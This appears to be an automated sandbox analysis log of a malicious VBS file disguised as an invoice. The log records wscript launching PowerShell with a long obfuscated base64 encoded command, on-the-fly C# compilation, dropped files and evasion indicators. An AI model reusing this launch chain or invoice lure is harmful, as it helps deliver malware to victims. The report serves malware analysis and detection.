    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.vbs"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD70A.tmp" "c:\Users\user\AppData\Local\Temp\nmk1nqgs\CSCB6EACAC7C331481095CED6A2215A0F6.TMP"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbgJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD70A.tmp" "c:\Users\user\AppData\Local\Temp\nmk1nqgs\CSCB6EACAC7C331481095CED6A2215A0F6.TMP"Jump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6888:120:WilError_01
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.vbs"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220510Jump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\Hetero3.datJump to behavior
    Source: classification engineClassification label: mal84.troj.evad.winVBS@8/9@0/0
    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: Binary string: k7C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.pdb source: powershell.exe, 00000010.00000002.758423763.000000000554C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.758073857.000000000536C000.00000004.00000800.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 00000010.00000002.763535179.0000000009970000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_04F226C9 push D004FB35h; retf 16_2_04F226D5
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_04F22097 push 0C00005Eh; retf 16_2_04F220A1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_07EFE598 pushad ; ret 16_2_07EFE599
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_07EF545A pushfd ; iretd 16_2_07EF5469
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.cmdline
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.dllJump to dropped file
    Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
